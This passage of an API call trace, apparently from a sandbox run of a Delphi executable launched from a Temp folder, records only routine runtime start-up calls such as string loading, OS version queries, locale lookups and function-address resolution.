(in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0093.737] LoadStringW (in: hInstance=0x400000, 
uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0093.738] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.738] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.738] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x274438 [0093.738] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0093.738] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | 
out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0093.738] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 
dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.738] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14b80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0093.738] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0093.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] GetThreadLocale () returned 0x409 [0093.739] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0093.739] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.739] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.739] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.739] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x274448 [0093.739] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.739] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0093.739] GetLastError () returned 0x7a [0093.739] GetLogicalProcessorInformation (in: Buffer=0x14a99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14a99d0, ReturnedLength=0x12fab0) returned 1 [0093.739] GetCurrentThreadId () returned 0xae8 [0093.739] GetCurrentThreadId () returned 0xae8 [0093.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0093.739] GetThreadLocale () returned 0x409 [0093.739] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.740] GetThreadLocale () returned 0x409 [0093.740] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.740] GetCurrentThreadId () returned 0xae8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.740] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0093.740] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0093.740] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.741] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 
0x76c26fab [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0093.742] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15053186184) returned 1 [0093.744] GetTickCount () returned 0x22bb1 [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15053324863) returned 1 [0093.744] GetTickCount () returned 0x22bb1 [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, 
wMilliseconds=0x2c4)) [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14b82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14a288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14b82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14b82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0093.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14bf48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14bf48c, cbMultiByte=24, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14bf48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0093.745] GetThreadLocale () returned 0x409 [0093.745] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0093.745] GetThreadLocale () returned 0x409 [0093.745] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.745] GetThreadLocale () returned 0x409 [0093.745] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0093.745] GetLocaleInfoW (in: 